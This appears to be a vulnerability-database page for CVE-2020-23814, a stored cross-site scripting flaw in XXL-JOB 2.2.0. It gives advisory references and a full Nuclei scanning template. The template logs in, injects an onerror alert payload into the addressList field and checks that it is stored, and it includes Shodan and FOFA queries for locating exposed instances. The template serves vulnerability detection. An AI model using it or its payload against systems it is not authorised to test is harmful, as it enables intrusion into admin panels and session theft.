| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2020-23814 | 15 Sep 202509:10 | – | circl | |
| xxl-job cross-site scripting vulnerability | 4 Sep 202000:00 | – | cnvd | |
| CVE-2020-23814 | 3 Sep 202016:58 | – | cve | |
| CVE-2020-23814 | 3 Sep 202016:58 | – | cvelist | |
| EUVD-2022-4808 | 3 Oct 202520:07 | – | euvd | |
| xxl-job Multiple cross-site scripting (XSS) vulnerabilities | 24 May 202217:27 | – | github | |
| CVE-2020-23814 | 3 Sep 202017:15 | – | nvd | |
| GHSA-PQQJ-299W-WF53 xxl-job Multiple cross-site scripting (XSS) vulnerabilities | 24 May 202217:27 | – | osv | |
| Cross site scripting | 3 Sep 202017:15 | – | prion | |
| PT-2020-15584 | 3 Sep 202000:00 | – | ptsecurity |
| Source | Link |
|---|---|
| github | www.github.com/xuxueli/xxl-job/issues/1866 |
| ccsq8 | www.ccsq8.com/issues.html |
id: CVE-2020-23814
info:
name: XXL-JOB v2.2.0 — Stored Cross Site Scripting
author: Sourabh-Sahu
severity: medium
description: |
Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.
impact: |
Authenticated attackers can inject malicious JavaScript through the AppName and AddressList parameters, potentially stealing admin session cookies or performing administrative actions on behalf of authenticated users.
remediation: |
Upgrade to XXL-JOB version 2.2.1 or later.
reference:
- https://github.com/xuxueli/xxl-job/issues/1866
- https://www.ccsq8.com/issues.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-23814
cwe-id: CWE-79
epss-score: 0.01188
epss-percentile: 0.64137
cpe: cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: xuxueli
product: xxl-job
shodan-query:
- http.html:"/xxl-job-admin/static/favicon.ico"
- http.favicon.hash:"1691956220"
fofa-query:
- app="xxl-job"
- icon_hash=1691956220
tags: cve,cve2020,xxl-job,xss,authenticated,vkev,vuln
flow: http(1) && http(2) && http(3) && http(4)
variables:
username: "{{username}}"
password: "{{password}}"
title: "{{to_lower(rand_base(6))}}"
http:
- raw:
- |
POST /xxl-job-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{RootURL}}
Referer: {{RootURL}}/xxl-job-admin/toLogin
X-Requested-With: XMLHttpRequest
userName={{username}}&password={{password}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "\"code\":200")'
condition: and
internal: true
- raw:
- |
GET /xxl-job-admin/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<b>XXL-JOB</b> 2.2.0")'
condition: and
internal: true
- raw:
- |
POST /xxl-job-admin/jobgroup/save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{RootURL}}
Referer: {{RootURL}}/xxl-job-admin/jobgroup
X-Requested-With: XMLHttpRequest
appname={{title}}&title={{title}}&addressType=1&addressList=<img src=# onerror=\"alert(document.domain)\" />
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "\"code\":200")'
condition: and
internal: true
- raw:
- |
POST /xxl-job-admin/jobgroup/pageList HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{RootURL}}
Referer: {{RootURL}}/xxl-job-admin/jobgroup
X-Requested-With: XMLHttpRequest
start=0&length=100
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "{{title}}","alert(document.domain)")'
condition: and
# digest: 4b0a00483046022100a8f3cd96b234e2f870523e0c464806cc06bb85cf553c2e3c4cf13435d086182f022100de7ff861db8b91d0ad420c0823305738247f1b93e5578ce38ecbfe41032f1949:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation